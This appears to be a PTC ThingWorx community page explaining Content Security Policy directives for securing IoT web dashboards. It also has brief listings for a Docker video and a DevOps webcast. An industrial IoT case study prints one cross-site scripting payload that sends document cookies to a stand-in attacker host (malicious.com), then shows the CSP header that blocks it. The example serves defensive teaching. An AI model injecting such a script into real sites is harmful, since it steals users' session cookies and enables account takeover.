Introduction    As the Internet of Things (IoT) continues to grow, securing web applications and connected devices is more critical than ever. Content Security Policy (CSP) is a security feature that helps protect IoT applications from malicious threats by controlling which resources—such as scripts, styles, and images—can be loaded and executed in a browser. This article explores what CSP is, the types of attacks it prevents, its role in securing IoT applications, the most common CSP directives used for enhanced security, and a real-world case study demonstrating CSP in action.    What is Content Security Policy (CSP)?    Content Security Policy (CSP) is a web security standard designed to reduce the risk of security vulnerabilities such as Cross-Site Scripting (XSS), data injection, and clickjacking by enforcing strict content-loading policies within web applications. It allows developers to specify which domains are permitted to execute scripts, load images, fetch data, and render styles, ensuring that only trusted sources can interact with the application.    How CSP Works    CSP works by defining security policies through HTTP headers or <meta> tags in the HTML document. These policies restrict the sources from which the browser can load various types of content, including JavaScript, CSS, and images. By doing so, CSP helps prevent unauthorized code execution and ensures that applications only interact with pre-approved content providers.    Why CSP is Essential    In an era where cyber threats are becoming more sophisticated, CSP plays a crucial role in securing web applications by:  Blocking Malicious Scripts: Prevents the execution of unauthorized JavaScript injected by attackers.  Preventing Data Exfiltration: Stops malicious code from sending sensitive user or device data to untrusted servers.  Mitigating Clickjacking: Restricts embedding in iframes to prevent deceptive UI attacks.  Enforcing Trusted Sources: Ensures that all resource requests originate from approved locations.    Types of Attacks Prevented by CSP    CSP acts as a defense mechanism against several types of web security threats, including:    a. Cross-Site Scripting (XSS)  Attackers inject malicious JavaScript into a web page to steal sensitive information, manipulate content, or perform unauthorized actions on behalf of the user.  CSP prevents XSS by restricting the execution of inline scripts and untrusted third-party JavaScript.    b. Clickjacking  Attackers trick users into clicking hidden elements (e.g., disguised buttons or links) within an iframe, potentially leading to account hijacking or unintended actions.  CSP helps mitigate clickjacking by enforcing the frame-ancestors directive, which controls who can embed the application in an iframe.    c. Data Injection Attacks  Attackers inject malicious content into an application, leading to data leaks, corrupted transactions, or manipulated IoT device responses.  CSP limits data injection risks by restricting content sources and enforcing secure policies   d. Mixed Content Attacks  When a secure HTTPS site loads insecure HTTP resources, attackers can intercept or modify the content.  CSP prevents mixed content vulnerabilities by enforcing policies that allow only secure content to be loaded.    Role of CSP in Securing IoT Applications    IoT applications often involve web-based dashboards, real-time analytics, and device interactions, making them attractive targets for cyber threats. CSP plays a crucial role in strengthening security by:    a. Restricting Untrusted Content  IoT platforms often load content dynamically from various sources, including APIs, third-party libraries, and external services. Without CSP, attackers can inject malicious scripts into these data streams, compromising the integrity of IoT dashboards. By defining strict CSP policies, developers can ensure that only pre-approved content sources are allowed.    b. Preventing Unauthorized Data Access  Many IoT applications handle sensitive data, such as real-time sensor readings, user credentials, and system logs. Attackers may attempt to inject malicious scripts that exfiltrate this data to external servers. CSP prevents such unauthorized access by blocking script execution from untrusted origins and preventing cross-origin data leaks.    c. Strengthening Access Control  In IoT ecosystems, multiple users, devices, and services interact with web applications. Without strict access controls, attackers can exploit weak points to execute unauthorized commands or alter data. CSP helps enforce access control by limiting the execution of scripts and API requests to verified sources, ensuring that only authenticated and authorized entities can interact with the system.    d. Minimizing Third-Party Risks  Many IoT applications integrate with third-party analytics tools, mapping services, and external widgets. If these third-party services are compromised, they can introduce vulnerabilities into the IoT ecosystem. CSP allows developers to whitelist only trusted third-party services, reducing the risk of supply chain attacks.    Common CSP Directives for Enhanced Security    To maximize security, developers should implement the following key CSP directives:  default-src: Defines the default source for all types of content (scripts, images, styles, etc.).  connect-src: Governs network requests (e.g., API calls, WebSockets, IoT data exchanges).  font-src: Specifies trusted sources for web fonts.  frame-ancestors: Prevents clickjacking by restricting which domains can embed the application in an iframe.  frame-src: Controls the sources from which iframes can be loaded.  img-src: Specifies trusted sources for loading images.  media-src: Defines allowed sources for media files like audio and video.  object-src: Restricts the sources from which plugins (e.g., Flash, Java applets) can be loaded.  script-src: Controls which sources are allowed to execute JavaScript.  style-src: Restricts the sources for CSS stylesheets.  worker-src: Defines the sources allowed to create web workers and service workers.  By defining a least-privilege CSP policy, developers can significantly reduce the attack surface and protect IoT applications from evolving cyber threats.    Case Study: Preventing an XSS Attack in an Industrial IoT Platform    Scenario:    A manufacturing company uses an Industrial IoT (IIoT) platform to monitor real-time sensor data from its factory machinery. The platform provides a web-based dashboard where engineers can track machine performance, predict failures, and configure alerts.    Attack Attempt:    An attacker exploits a form input field used for naming machines and injects the following malicious script:    <script>fetch('https://malicious.com/steal?data='+document.cookie);</script>    Since the platform lacks CSP enforcement, this script executes within the engineers’ browsers, stealing session cookies and granting unauthorized access to the attacker.    How CSP Prevented the Attack:    By implementing a CSP policy that restricts script execution to trusted sources, the attack is neutralized. The following CSP directive is applied:    Content-Security-Policy: script-src 'self' https://trusted-scripts.com;    This prevents unauthorized script execution, ensuring that malicious scripts injected by attackers do not run within the IIoT platform. As a result, the IIoT system remains secure, preventing attackers from compromising sensitive factory data or disrupting production operations.    Conclusion    Content Security Policy (CSP) is a fundamental security measure for modern web applications, particularly those operating in IoT environments. By understanding CSP, recognizing the threats it mitigates, and implementing the most effective directives, developers can ensure a more secure and resilient application framework.    CSP support has been introduced in ThingWorx versions 9.3.15, 9.4.5, 9.5.1, and 9.6.0. In the initial release, this feature will be disabled by default, and cloud customers will need to contact the support team to request activation, as it will not be enabled by default. The current implementation establishes a foundation that facilitates future out-of-the-box (OOTB) enablement of CSP in subsequent releases.   For more information on implementing the Content Security Policy, kindly refer to ThingWorx Help Center   Vineet Khokhar Principal Product Manager, IoT Security   Stay tuned for more updates as we approach the release of ThingWorx v10.0, and as always, in case of issues, feel free to reach out to <support.ptc.com>   
View full tip
Video Author:                     Christophe Morfin Original Post Date:            September 26, 2017 Applicable Releases:        ThingWorx Analytics 8.0 & 8.1   Description:​ This video shows the commands to execute to deploy the training and results microservices as docker container.  This is based on Docker Toolbox to highlight the specific settings required on Toolbox.    
View full tip
Is your team operating an effective DevOps pipeline? DevOps is an important part of a mature, enterprise ready application, but the process isn’t simple.   This expert session will focus on how a full DevOps pipeline looks like and how PTC can help to build a seamless pipeline. Join us for our upcoming Expert Session to learn how to create a Docker image, integrate Azure with Docker and Git, and set up a seamless DevOps pipeline.   When? Thursday, September 30th 2021 | 11 AM EST Host: Tori FIrewind, Senior Engineer in PTC IOT Enterprise Deployment Center Registration link: https://www.ptc.com/en/resources/iiot/webcast/devops-pipeline-thingworx 
View full tip
Announcements